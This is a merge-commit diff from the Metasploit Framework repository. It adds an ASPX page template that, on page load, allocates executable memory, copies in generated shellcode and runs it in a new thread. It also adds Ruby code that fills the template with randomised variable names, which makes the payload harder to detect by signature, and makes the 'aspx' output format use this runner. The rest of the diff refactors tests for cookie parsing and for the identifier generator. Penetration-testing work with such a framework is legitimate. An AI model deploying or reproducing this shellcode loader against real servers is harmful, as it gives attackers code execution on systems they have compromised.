Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
commit
9fde8bee2b
|
@ -0,0 +1,21 @@
|
|||
<%%@ Page Language="C#" AutoEventWireup="true" %%>
|
||||
<%%@ Import Namespace="System.IO" %%>
|
||||
<script runat="server">
|
||||
private static Int32 MEM_COMMIT=0x1000;
|
||||
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
|
||||
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
%{shellcode}
|
||||
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
|
||||
IntPtr %{var_threadId} = IntPtr.Zero;
|
||||
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
|
||||
}
|
||||
</script>
|
|
@ -13,6 +13,7 @@ class EXE
|
|||
require 'rex'
|
||||
require 'rex/peparsey'
|
||||
require 'rex/pescan'
|
||||
require 'rex/random_identifier_generator'
|
||||
require 'rex/zip'
|
||||
require 'metasm'
|
||||
require 'digest/sha1'
|
||||
|
@ -56,8 +57,8 @@ require 'msf/core/exe/segment_injector'
|
|||
end
|
||||
end
|
||||
|
||||
def self.read_replace_script_template(filename, hash_sub)
|
||||
template_pathname = File.join(Msf::Config.install_root, "data", "templates", "scripts", filename)
|
||||
def self.read_replace_script_template(filename, hash_sub)
|
||||
template_pathname = File.join(Msf::Config.data_directory, "templates", "scripts", filename)
|
||||
|
||||
template = ''
|
||||
File.open(template_pathname, "rb") do |f|
|
||||
|
@ -822,17 +823,32 @@ def self.to_vba(framework,code,opts={})
|
|||
return read_replace_script_template("to_exe.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_win32pe_psh_net(framework, code, opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
def self.to_mem_aspx(framework, code, exeopts={})
|
||||
# Intialize rig and value names
|
||||
rig = Rex::RandomIdentifierGenerator.new()
|
||||
rig.init_var(:var_funcAddr)
|
||||
rig.init_var(:var_hThread)
|
||||
rig.init_var(:var_pInfo)
|
||||
rig.init_var(:var_threadId)
|
||||
rig.init_var(:var_bytearray)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
|
||||
|
||||
return read_replace_script_template("to_mem.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_win32pe_psh_net(framework, code, opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
|
||||
|
||||
|
@ -1532,21 +1548,24 @@ def self.to_vba(framework,code,opts={})
|
|||
output = Msf::Util::EXE.to_exe_asp(exe, exeopts)
|
||||
|
||||
when 'aspx'
|
||||
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
|
||||
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
|
||||
output = Msf::Util::EXE.to_mem_aspx(framework, code, exeopts)
|
||||
|
||||
when 'dll'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
|
||||
end
|
||||
when 'exe'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe(framework, code, exeopts)
|
||||
end
|
||||
when 'aspx-exe'
|
||||
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
|
||||
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
|
||||
|
||||
when 'dll'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
|
||||
end
|
||||
when 'exe'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe(framework, code, exeopts)
|
||||
end
|
||||
|
||||
when 'exe-service'
|
||||
output = case arch
|
||||
|
@ -1629,12 +1648,12 @@ def self.to_vba(framework,code,opts={})
|
|||
output
|
||||
end
|
||||
|
||||
def self.to_executable_fmt_formats
|
||||
[
|
||||
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
|
||||
'vbs','loop-vbs','asp','aspx','war','psh','psh-net'
|
||||
]
|
||||
end
|
||||
def self.to_executable_fmt_formats
|
||||
[
|
||||
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
|
||||
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net'
|
||||
]
|
||||
end
|
||||
|
||||
#
|
||||
# EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR
|
||||
|
|
|
@ -66,15 +66,22 @@ class Rex::RandomIdentifierGenerator
|
|||
#}
|
||||
end
|
||||
|
||||
# Return a unique random identifier for +name+, generating a new one
|
||||
# if necessary.
|
||||
#
|
||||
# @param name [Symbol] A descriptive, intention-revealing name for an
|
||||
# identifier. This is what you would normally call the variable if
|
||||
# you weren't generating it.
|
||||
# @return [String]
|
||||
def get(name)
|
||||
return @value_by_name[name] if @value_by_name[name]
|
||||
# Returns the @value_by_name hash
|
||||
#
|
||||
# @return [Hash]
|
||||
def to_h
|
||||
return @value_by_name
|
||||
end
|
||||
|
||||
# Return a unique random identifier for +name+, generating a new one
|
||||
# if necessary.
|
||||
#
|
||||
# @param name [Symbol] A descriptive, intention-revealing name for an
|
||||
# identifier. This is what you would normally call the variable if
|
||||
# you weren't generating it.
|
||||
# @return [String]
|
||||
def get(name)
|
||||
return @value_by_name[name] if @value_by_name[name]
|
||||
|
||||
@value_by_name[name] = generate
|
||||
@name_by_value[@value_by_name[name]] = name
|
||||
|
@ -82,6 +89,7 @@ class Rex::RandomIdentifierGenerator
|
|||
@value_by_name[name]
|
||||
end
|
||||
alias [] get
|
||||
alias init_var get
|
||||
|
||||
# Add a new identifier. Its name will be checked for uniqueness among
|
||||
# previously-generated names.
|
||||
|
|
|
@ -1,112 +1,191 @@
|
|||
require 'rex/proto/http/response'
|
||||
|
||||
get_cookies_test_1 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 12:43:12 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 63951
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_2 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_3 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_4 ='
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
describe Rex::Proto::Http::Response do
|
||||
R = Rex::Proto::Http::Response
|
||||
it "get_cookies returns empty string for no Set-Cookies" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_1)
|
||||
resp.get_cookies.should eq("")
|
||||
end
|
||||
|
||||
it "get_cookies returns 5 cookies for test 2" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_2)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
end
|
||||
def get_cookies_test_no_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 12:43:12 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 63951
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
|
||||
it "get_cookies returns 5 cookies for test 3 and parses full cookie" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_3)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
resp.get_cookies.include?("superC00kie!=stupidcookie;").should be_true
|
||||
end
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_five_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_five_ordered_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_with_empty_cookie
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_one_set_cookie_header
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 25 Sep 2013 20:29:23 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.9-4ubuntu2.2
|
||||
Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
||||
Last-Modified: Wed, 25 Sep 2013 20:29:23 GMT
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
Pragma: no-cache
|
||||
Set-Cookie: wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin; path=/wordpress-2.0/, wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3; path=/wordpress-2.0/
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def cookie_sanity_check(meth)
|
||||
resp = described_class.new()
|
||||
resp.parse(self.send meth)
|
||||
cookies = resp.get_cookies
|
||||
cookies.should_not be_nil
|
||||
cookies.should_not be ''
|
||||
cookies.split(';').map(&:strip)
|
||||
end
|
||||
|
||||
context "#get_cookies" do
|
||||
|
||||
it 'returns empty string for no Set-Cookies' do
|
||||
resp = described_class.new()
|
||||
resp.parse(get_cookies_test_no_cookies)
|
||||
resp.get_cookies.should eq('')
|
||||
end
|
||||
|
||||
it 'returns 5 cookies when given 5 cookies non-sequentially' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_five_cookies)
|
||||
cookies_array.count.should eq(5)
|
||||
cookies_array.should =~ %w(
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
|
||||
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
|
||||
)
|
||||
end
|
||||
|
||||
it 'returns and parses 5 cookies when given 5 ordered cookies' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_five_ordered_cookies)
|
||||
cookies_array.count.should eq(5)
|
||||
expected_cookies = %w{
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
|
||||
superC00kie!=stupidcookie
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
end
|
||||
|
||||
it 'parses an empty cookie value' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_with_empty_cookie)
|
||||
cookies_array.count.should eq(5)
|
||||
expected_cookies = %w{
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=
|
||||
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
|
||||
end
|
||||
|
||||
it 'parses multiple cookies in one Set-Cookie header' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_one_set_cookie_header)
|
||||
cookies_array.count.should eq(2)
|
||||
expected_cookies = %w{
|
||||
wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin
|
||||
wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
it "get_cookies returns 5 cookies for test 4 and parses empty value" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_4)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
resp.get_cookies.include?("phpMyAdmin=;").should be_true
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -11,6 +11,8 @@ describe Rex::RandomIdentifierGenerator do
|
|||
it { should respond_to(:generate) }
|
||||
it { should respond_to(:[]) }
|
||||
it { should respond_to(:get) }
|
||||
it { should respond_to(:store) }
|
||||
it { should respond_to(:to_h) }
|
||||
|
||||
describe "#generate" do
|
||||
it "should respect :min_length" do
|
||||
|
@ -120,4 +122,20 @@ describe Rex::RandomIdentifierGenerator do
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
describe "#to_h" do
|
||||
it "should return a Hash" do
|
||||
rig.to_h.should be_kind_of(Hash)
|
||||
end
|
||||
it "should return expected key-value pairs" do
|
||||
expected_keys = [:var_foo, :var_bar]
|
||||
expected_keys.shuffle.each do |key|
|
||||
rig.init_var(key)
|
||||
end
|
||||
rig.to_h.size.should eq(expected_keys.size)
|
||||
rig.to_h.keys.should include(*expected_keys)
|
||||
rig.to_h.values.map {|v| v.class}.uniq.should eq([String])
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -24,6 +24,8 @@ shared_context 'Msf::Util::Exe' do
|
|||
{ :format => "loop-vbs", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "asp", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "asp", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx-exe", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx-exe", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "vba", :arch => "x86", :file_fp => /ASCII/ },
|
||||
|
|
Loading…
Reference in New Issue